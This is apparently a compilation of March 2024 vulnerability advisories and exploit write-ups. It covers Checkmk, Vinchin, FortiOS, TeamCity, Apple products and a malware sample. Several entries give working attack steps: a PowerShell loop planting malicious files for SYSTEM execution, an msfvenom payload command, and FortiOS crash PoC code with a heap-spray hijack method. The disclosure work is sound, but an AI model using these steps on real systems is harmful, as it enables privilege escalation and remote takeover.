Checkmk Agent versions 2.0.0, 2.1.0, and 2.2.0 suffer from a local privilege escalation vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20240307-0 >  
=======================================================================  
               title: Local Privilege Escalation via writable files  
             product: Checkmk Agent  
  vulnerable version: 2.0.0, 2.1.0, 2.2.0  
       fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1  
          CVE number: CVE-2024-0670  
              impact: high  
            homepage: https://checkmk.com  
               found: 2023-12-01  
                  by: Michael Baer (Office Fürth)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Checkmk 2.2 has arrived – and is ready to monitor your hybrid IT  
infrastructure with new features for monitoring native cloud applications,  
OpenShift support, an expanded REST API, UX improvements, enhanced  
integrations and over 174 new or reworked checks and agents. Monitor your  
cloud assets from top hyperscalers with Checkmk 2.2 in addition to the  
powerful monitoring of your on-premises networks and servers."

Source: https://checkmk.com/product/latest-version

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via writable files (CVE-2024-0670)  
In some cases, the software creates temporary files inside the directory  
C:\Windows\Temp that get executed afterwards. An attacker can leverage this  
to place write-protected malicious files in the directory beforehand. The files  
get executed by Checkmk with SYSTEM privileges allowing attackers to escalate  
their privileges.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via writable files (CVE-2024-0670)  
In the first step, the filename that will be used by Checkmk needs to be found.  
The application creates temporary files with name cmk_{}_{}_{}.cmd. The  
placeholders are replaced with a string, the process id and a counter. The first  
string was always 'all' and the counter usually is 0. The process id is not  
exactly predictable. However, Windows assigns those numbers in increasing order.  
This allows to observe the currently used process ids and define a limited  
range of probable ids.

In the second step, the attacker places the malicious binary into the folder  
C:\Windows\Temp multiple times. The filenames are constructed using the above  
pattern for all different probable ids. After placing the files, the attacker  
marks them as read-only. Both can be automated using the following powershell  
command. Here, the range of probable ids was determined to be between 10000  
and 30000. The file C:\Users\attacker\Desktop\mal.exe is the malicious file.

10000..30000 | foreach {  
  copy C:\Users\attacker\Desktop\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd;  
  Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;  
}

For this proof of concept, a binary was created using msfvenom that executes  
the command whoami and writes the result to a file. This will allow to verify  
the successful execution as the SYSTEM user. The following command was used:

msfvenom -p windows/exec CMD='cmd /c "whoami > C:\abc\file"' -f exe -o mal.exe

It should be noted, that the folder C:\abc has to exist and that the anti-virus  
solution must be disabled to execute this particular binary.

The final step is to force Checkmk to write and execute those temporary files.

It was observed that repairing the software is enough. This repair process can  
be initiated via the Windows GUI or using the following command. The name  
fafda3e.msi will be different on every system. The folder C:\Windows\Installer  
can be investigated to find the correct name on a given system.

msiexec /fa C:\Windows\Installer\fafda3e.msi

After the repairing finished, the file written by the malicious binary can be  
checked. It was created and contains the string "nt authority\system".  
[see figure checkmk_tempfolder.png]

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 2.1.0

According to the vendor, the following versions are affected:  
* 2.0.0  
* 2.1.0  
* 2.2.0

Vendor contact timeline:  
------------------------  
2024-01-15: Contacting vendor through security@checkmk.com  
2024-01-18: Vendor confirms vulnerability, assigns CVE, and  
             prepares a fix  
2024-01-26: Providing credits and acknowledging CVSS score.  
2024-03-04: Vendor informs us that fixes with Werk #16361  
             are available.  
2024-03-07: Coordinated release of security advisory.

Solution:  
---------  
Install the latest version 2.1.0p40 or 2.2.0p23 from the vendor's  
download page:

https://checkmk.com/download

More information can be found within the vendor's security advisory:  
https://checkmk.com/werk/16361

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Baer / @2024

Checkmk Agent 2.0.0 / 2.1.0 / 2.2.0 Local Privilege Escalation

Vinchin Backup and Recovery versions 7.2 and below suffer from an authentication command injection vulnerability.

    CVE ID: CVE-2024-25228Title: Authenticated Command Injection Vulnerability in ManoeuvreHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and EarlierDescription:A critical security vulnerability has been discovered in the `getVerifydiyResult` function within the `ManoeuvreHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, intended for validating IP addresses or web resources, is vulnerable to authenticated command injection due to insufficient input validation and sanitization.Function Analysis:- The function accepts an input array `$params`, focusing on the `type` and `value` keys.- Based on the `type`, it attempts to validate the input using either `verifyPing` (for IP addresses) or `verifyWeb` (for web resources).- The vulnerability specifically lies in the `verifyPing` method, where the `exec` function is used to execute a `ping` command with the user-supplied `value`, without proper validation or sanitization.Exploitation Risk:Authenticated attackers can exploit this vulnerability by injecting malicious commands into the `value` parameter. When processed by the vulnerable function, these commands can be executed on the server, leading to unauthorized access or control.Current Status:As of the latest available information, no patch has been released for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery. The vendor has not acknowledged the vulnerability.Recommendation:Users are advised to apply strict access controls to mitigate the risk posed by this vulnerability until an official patch is released. Monitoring for any updates from Vinchin regarding this issue is also recommended.Discoverer: Valentin Lobstein

Vinchin Backup And Recovery 7.2 Command Injection

Fortinet FortiOS suffers from an out of bounds write vulnerability. Affected includes Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, and 1.0.0 through 1.0.7.

# CVE-2024-21762  
out-of-bounds write in Fortinet FortiOS  CVE-2024-21762 vulnerability 

Vulnerability  
=====

FortiGate released a version update in February, fixing multiple medium- and high-risk vulnerabilities. One of the severe-level vulnerabilities is an unauthorized out-of-bounds write vulnerability in SSL VPN. The vulnerability warning states that this vulnerability may be exploited in the wild. This article will introduce the author's analysis of the process of exploiting this vulnerability to achieve remote code execution.

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/7f0e0f05-9d1b-4e4e-b877-646dc585f07a)

The environment used for vulnerability analysis in this article is `FGT_VM64-v7.4.2.F-build2571` 

diff   
======

Comparing the binaries of the repaired versions (7.4.2 and 7.4.3), the analysis found that the repair code is located in function `sub_18F4980`(7.4.2).

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a07f1ef5-5fc6-451b-9613-d1adbeb1e734)

Analyzing this function, it is not difficult to find that the logic of this function is to read the body data of the HTTP POST request. At the same time, Transfer-Encodingit is determined according to the request header whether to read in chunk format or based on Content-Lengthreading. According to the control flow graph comparison results, there are two code modifications:

When parsing the chunk format, call ap_getlinethe read chunk length and check ap_getlinewhether the return value is greater than 16. If it is greater than 16, it is considered an illegal chunk length.

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/079c74e6-1302-42ce-bb83-519e11d9505b)

When reading the chunk trailer, the source of the written \r\noffset is `line_offthe` assignment source, `line_offthe` value before repair is from , and the return value after `*(_QWORD *)(a1 + 744)` repair is . `line_offap_getline`

Continuing to trace forward, `*(_QWORD *)(a1 + 744)` the value that can be found is the length of the chunk length field of the first verification.

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a11a4bea-7e45-4ec7-b63c-34f8dd0337c0)

Continuing to trace forward, `*(_QWORD *)(a1 + 744)` the value that can be found is the length of the chunk length field of the first verification.

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/63f92eaf-68f6-4d32-935b-0451e5da07dc)

At the same time, reading the code can tell that when the value of the chunk length field is 0 after hex decoding, it will enter the logic of chunk trailer reading.

Triggering out-of-bounds   
=========

After analyzing the patch, we can draw the following conclusions:

1. When parsing a chunk, if the hex decoded value of the chunk length field is 0, start reading the chunk trailer.  
2. After calling ap_getline to read the chunk trailer, it will be written to the buffer according to the length of the chunk length field `\r\n`.  
3.   
Therefore, if many 0s are passed in the chunk length field, and the length of 0s is greater than 1/2 of the remaining buffer length, an out-of-bounds write will be triggered \r\n. Through debugging, we can know that the target buffer is located on the stack `(function sub_1A111E0)` , and the return address is stored at offset 0x2028. If written at offset 0x202e `\r\n`, reta crash will occur due to an illegal address when the function returns to execute the instruction to resume rip.

Crash PoC:

```http  
pkt = b"""\  
GET / HTTP/1.1  
Host: %s  
Transfer-Encoding: chunked

%s\r\n%s\r\n\r\n""" % (hostname.encode(), b"0"*((0x202e//2)-2), b"a")

ssock = create_ssock(hostname, port)  
ssock.send(pkt)  
ssock.recv(4096)  
```

Crash scene:

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b948f525-bee9-4344-85c1-b1fce8d65acb)

By analyzing the cause of the vulnerability, it can be seen that the vulnerability can be used to write `\r\n` two bytes out of bounds on the stack, and the out-of-bounds range is close to `0x2000`. Since the written content is very limited, RCE cannot be achieved by directly hijacking rip. Therefore, you need to focus on the memory pointer saved on the stack.

failed attempt  
============

What is easier to think of is to hijack rbp and overwrite the low byte of rbp so that rbp just points to a controllable memory area. When the upper-level function returns to execute the instruction, rip can be completely hijacked. However, during verification, it was found that even if rbp on the stack is overwritten, rsp and rip cannot be hijacked, and the program will not even crash. Continuing to trace back up, we find the parent function . This function is not called to restore rsp when it returns , but directly , so it cannot achieve the expected effect. leave retsub_1A111E0sub_1A26040 leave retadd rsp, 0x18

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9097dd29-45a8-41c7-99be-eddd88308cce)

Find another breakthrough point  
======

As seen in the previous section, the function saves the values ​​of the five registers `rbx` and r12-r15 on the stack, and restores these registers when the function returns. Continue backtracking to find the parent function . You can see that what is saved in r13 is exactly the parameters `sub_1A26040sub_1A27650a1` .

a1 is a structure pointer. Through debugging, we can also see that a heap address is saved on the stack r13

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/8d419563-39f1-47b0-93b5-8f438cdecbf7)

If the memory in the red area in the figure is overwritten by out-of-bounds writing, then the r13 register is restored when the function returns, and the value of the pointer can be tampered with . If the heap memory can be laid out so that a1 points to a memory area arranged in advance, then the entire a1 structure can be hijacked. At the same time, through analysis of the code logic of and , there are a large number of dynamic function calls of a1 multi-level structure members, so there will be more opportunities to hijack **a1.sub_1A26040a1sub_1A27650sub_1A26040**

Hijacking a structure  
==============

According to the assumption, after the low byte of the a1 pointer is overwritten , it can point to the pre-arranged memory. as the picture shows: `\r\n`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/16ecb081-617e-42a6-b0d7-f009d0a235a3)

In order to achieve this effect, the following conditions need to be met:

The `a1` structure address is higher than the heap spray area address, and the gap between them is very small.  
`0x7fxxxxxxx0a0d` Must point to the forged structure.

Debugging can find that the size of the a1 structure is `0x730` . According to the alignment rules of jemalloc, a heap block of size `0x800` will be allocated. The 0x800 heap block is not commonly used during request processing, so it is easy to exhaust the `0x800` heap block in tcache, and at the same time apply for more new 0x800 blocks, so that they can enter tcache after release. Heap injection also selects heap blocks of uncommon sizes so that the newly applied heap blocks are continuous and close to the newly applied 0x800; heap injection chooses to use larger heap blocks to ensure that their addresses are aligned with 0x800, so that It is easy to ensure that the lower 12 bits of each forged structure address are 0xa0d; the heap spray range is not less than `0x10000` to ensure that it points to the heap spray area. The effect after hijacking is as follows: `0x7fxxxxxxx0a0d`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/4553bf2f-7590-4dcd-bd94-972465e7be5f)

Find exploitable multi-level pointers  
======================

Through the above operations, the hijacking of the a1 structure can be achieved. Combing through the code of function sum, there are many dynamic calls to the second-level pointer and third-level pointer of the a1 structure member, for example: `sub_1A27650sub_1A26040`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f9f65242-90dd-43ee-8fdb-95fa9059805e)

When `(0<N<5)` is satisfied , it will be called dynamically . Therefore, the member needs to be faked into a multi-level pointer, which ultimately points to the function we want to call. Since the target binary does not have PIE protection turned on, you can find qualified multi-level pointers in the target binary. Analyzing the binary, we can find that the first points to the GOT table address of the corresponding function.`*(_BYTE *)(a1+0x20*(N+6)+0x10)&6==0*(__int64 (__fastcall **)(__int64))(*(_QWORD *)(*(_QWORD *)(a1 + 0x298)+0x70)+0xC0)(a1)a1 + 0x298` 

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9d274361-093b-4042-9c67-bd5083c8d888)

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f27436b9-a3d1-4650-85d6-6117b57ad3a3)

Therefore, taking functions as an example, you can find qualified multi-level pointers **system**

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/3ca3f7d6-b416-4cf8-9c41-6f6eb1e79b0e)

During heap spraying, changing the value at offset 0x298 of the structure can be used to call the system function. The effect is as follows: `0x4368d0`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/c19cfc84-c3c3-43a5-909b-5d5eee935815)

As shown in the figure, the parameter of the dynamic call is exactly a1, and the memory pointed to is controllable. At this point, you can normally use the system function to execute any command. However, in FortiGate, the file does not have the ability to execute commands, so using the system function to execute commands cannot be executed successfully. `/bin/sh`

Hijack RIP  
============

Since the system function cannot execute commands, we can only find other ways to complete RCE. The existing condition is that any GOT table function can be called, and the memory pointed to by the first parameter of the function is controllable. Therefore, if there is a function in the GOT table that will call back a certain member of the parameter, there is a chance to achieve RIP hijacking. It’s easy to think of functions that were often used in previous FortiGate exploits . **SSL_do_handshake**

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/bc6aaf2a-9c58-4ade-9af0-ccadcc79274b)

You only need to construct the SSL structure so that the conditions are met and the final call is made to realize rip hijacking and hijack rip to 0xdeadbeef as shown in the `figure:s->handshake_func(s)`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b3979820-893f-47e3-bd94-b63fa58a7bb7)

The FortiGate main program is an All-in-One binary with a size of over 70MB. There are a large number of gadgets that can be used. It is not difficult to implement RCE using ROP, so I won’t go into details.

### demo :

Although web mode is turned off by default in SSL VPN version 7.4.2 and browser access returns 403, this vulnerability can still be exploited in the default configuration.

![ezgif-6-c1d88c0511](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/0e8188fa-de85-4579-b932-924c0e54b334)

This vulnerability is similar to the heap overflow vulnerability caused by XOR last year . They are both seemingly useless overflow vulnerabilities. The exploitation process is more tricky and more like a CTF question. However, compared with traditional CTF problems that attack heap managers, real vulnerabilities require more context structures and code logic to be exploited. The author's level is limited. If there are any mistakes, please correct me.CVE-2023-27997

original post In Chinese : https://mp.weixin.qq.com/s?__biz=Mzk0OTU2ODQ4Mw==&mid=2247484811&idx=1&sn=2e0407a32ba0c2925d6d857f4cdf7cbb&chksm=c3571307f4209a110d6b28cea9fe59ac0f0a2079c998a682e919860f397ea647fa0794933906&mpshare=1&scene=1&srcid=0313EaETjGzEAvOdByUt6ovU#rd

Fortinet FortiOS Out-Of-Bounds Write

This Metasploit module exploits an authentication bypass vulnerability in JetBrains TeamCity. An unauthenticated attacker can leverage this to access the REST API and create a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload, allowing the attacker to achieve unauthenticated remote code execution on the target TeamCity server. On older versions of TeamCity, access tokens do not exist so the exploit will instead create a new administrator account before uploading a plugin. Older versions of TeamCity have a debug endpoint (/app/rest/debug/process) that allows for arbitrary commands to be executed, however recent version of TeamCity no longer ship this endpoint, hence why a plugin is leveraged for code execution instead, as this is supported on all versions tested.

JetBrains TeamCity Unauthenticated Remote Code Execution

Apple Security Advisory 03-12-2024-1 - GarageBand 10.4.11 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-12-2024-1 GarageBand 10.4.11

GarageBand 10.4.11 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214090.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

GarageBand  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination or arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-23300: Marc Schoenefeld, Dr. rer. nat.

GarageBand 10.4.11 may be obtained from the App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXw5dYACgkQX+5d1TXa  
IvpFLw/9ExaKuCx71r7iHpq/1M5z8aHNZNl3mZPP/NoVQIs8/ERz/n0fBRRljSZg  
8LnRH2lsRBKZtxN9CVEu5H5W8xAHa6DMdvMozjvwRbWFh0xDlLtgXbpuv9GGTGcB  
tmu9uQxpebG+s5MTfng2gZ1bSQ8G8dvEicHmLOsjIps8cI89uOiciXnFKb7GEOgD  
CO6quhznWETyzRZwAQtGQiD9jI7xgrlZLIGYb/dKg+WAvJrPvXvhZPLNdWCTwikp  
RD7xf2lzfu8S+o00FrjFQ1r5Xdt/GW8VUiT+r8cb65+v9HESzJUs2hoCXxQtzKYD  
SSAzbbAG9/n4Ku92jGItiGRk0M/wjJSvwWoBlUh3LTjA3XM75+vohl2PCGOoan+r  
TDTDf9PbAnSP4ysWM8/uXphebzLDww2c0pDaHRx6ZhAwi3BsHForVXJyD3DVWC92  
kw9PoYR3vcaJzAvDlWmrNTzrRRIU7SDT053fwst92zltirXjJB8lGYmtZTxWTbfS  
r6zCafVaxDhnuiDOdfnLSo0h5KBI1NXqG4H2mwI4f0ddP3Xn+m3XnF/apX3CXLZz  
58ulakxmg8Xsil0oV/1k46aQnEXjy2bwyt8CdUxOgcamd/haakOh0xsAnKltNbPi  
LUtwvFj6mbYV8u7PHgQSvK4O8Mmdm5BS48TNXZT6WR8Xz06DHp0=  
=JCnR  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-12-2024-1

Apple Security Advisory 03-07-2024-7 - visionOS 1.1 addresses buffer overflow, bypass, code execution, and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-7 visionOS 1.1

visionOS 1.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214087.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Vision Pro  
Impact: An app may be able to spoof system notifications and UI  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-23262: Guilherme Rambo of Best Buddy Apps (rambo.codes)

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23257: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-23258: Zhenjiang Zhao of pangu team and Qianxin

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Vision Pro  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

Metal  
Available for: Apple Vision Pro  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

Persona  
Available for: Apple Vision Pro  
Impact: An unauthenticated user may be able to use an unprotected  
Persona  
Description: A permissions issue was addressed to help ensure Personas  
are always protected  
CVE-2024-23295: Patrick Reardon

RTKit  
Available for: Apple Vision Pro  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Safari  
Available for: Apple Vision Pro  
Impact: An app may be able to fingerprint the user  
Description: The issue was addressed with improved handling of caches.  
CVE-2024-23220

UIKit  
Available for: Apple Vision Pro  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple Vision Pro  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) and 이준성(Junsung  
Lee) for their assistance.

Model I/O  
We would like to acknowledge Junsung Lee for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Safari  
We would like to acknowledge Abhinav Saraswat, Matthew C, and 이동하 ( Lee  
Dong Ha of ZeroPointer Lab ) for their assistance.

WebKit  
We would like to acknowledge Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Instructions on how to update visionOS are available at  
https://support.apple.com/kb/HT214009  To check the software version  
on your Apple Vision Pro, open the Settings app and choose General >  
About.  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqch0ACgkQX+5d1TXa  
Ivp/nA//XUiuB8BB/bRbBd0c9z/0DScN1cEWhZaAiWh7HGiOji+HjUv3GocXDHTh  
65MqZ3y4C08Qr5qDNzZOnaTUZgbk+h3Pz62SoSS0deI3xp1uNpHsmtSqMh6Qs30I  
/IMBpmBuyqoL6w9KBSAubqsrwT/SVQuz67yMCSNUQ27KL3Dymf1JFKf+oaKYTC5R  
TRrmZ1yzWkvziGYYsjUR+G+HiwnQza/39sFOu7Eezkv+lqtQcP1v2eFRporxqvDX  
QejHf4mUIqNZs9KSe7z2uguRlMTbAaaOFt0UCXHhXXifQK9fmrOP9vKofAiy7S54  
NDuSa6gZzKvakC0VxUozGZaFhVocDDbWOBrH6eLI3RTR59sl5RXv4cFTZXp5Xfy4  
4xj99QM/zXb75TnPTWPlCJ9E2CfmFtfTRDa7wgZgeRL2dfHihaCV7/p28m8vdOAS  
QDbOBlReS27zwOcxVUSo+LcPvymve7ObCUc+ITwHW7V3Uq92mKfYmbv99ovxQGNB  
9LAChqBoYfWTbUAfP9/cvY++543CAE5xmzSIfnmFEH04ZA2Fh4Gc6mmo1W3Q24Hx  
QwhV1agy52x2t4g+BABQSNkwLDkS9yGj/SNqz1fknVyFoKry0tZAdXGM51PwQvV1  
7BnKw3PgU0EZK135spUgfhRBbemWfoISY9t/QqA2RCp9hiEsXZA=  
=pp0o  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-7

Backdoor.Win32.Emegrab.b malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Emegrab.b  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Family: Emegrab  
Type: PE32  
MD5: 19a14d0414aec62ef38378de2e8b259d  
Vuln ID: MVID-2024-0675  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 03/13/2024  
Description: The malware listens on TCP port 2323 (typically) however, have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978 then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH).

Memory Dump:  
(14c0.b6c): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000  
eip=41414141 esp=260013e8 ebp=26001408 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???

0:009> .ecxr  
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000  
eip=41414141 esp=260013e8 ebp=26001408 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???

0:009> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e  
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e - 

FAULTING_IP:   
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b  
0040fa2b 888434a0000000  mov     byte ptr [esp+esi+0A0h],al

EXCEPTION_RECORD:  260f5de8 -- (.exr 0x260f5de8)  
ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 26100000  
Attempt to write to address 26100000

PROCESS_NAME:  Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP:   
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b  
0040fa2b 888434a0000000  mov     byte ptr [esp+esi+0A0h],al

FAILED_INSTRUCTION_ADDRESS:   
+fa2b  
41414141 ??              ???

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  260f5e38 -- (.cxr 0x260f5e38)  
eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74  
eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b:  
0040fa2b 888434a0000000  mov     byte ptr [esp+esi+0A0h],al ss:002b:26100000=??  
Resetting default scope

FAULTING_THREAD:  ffffffff

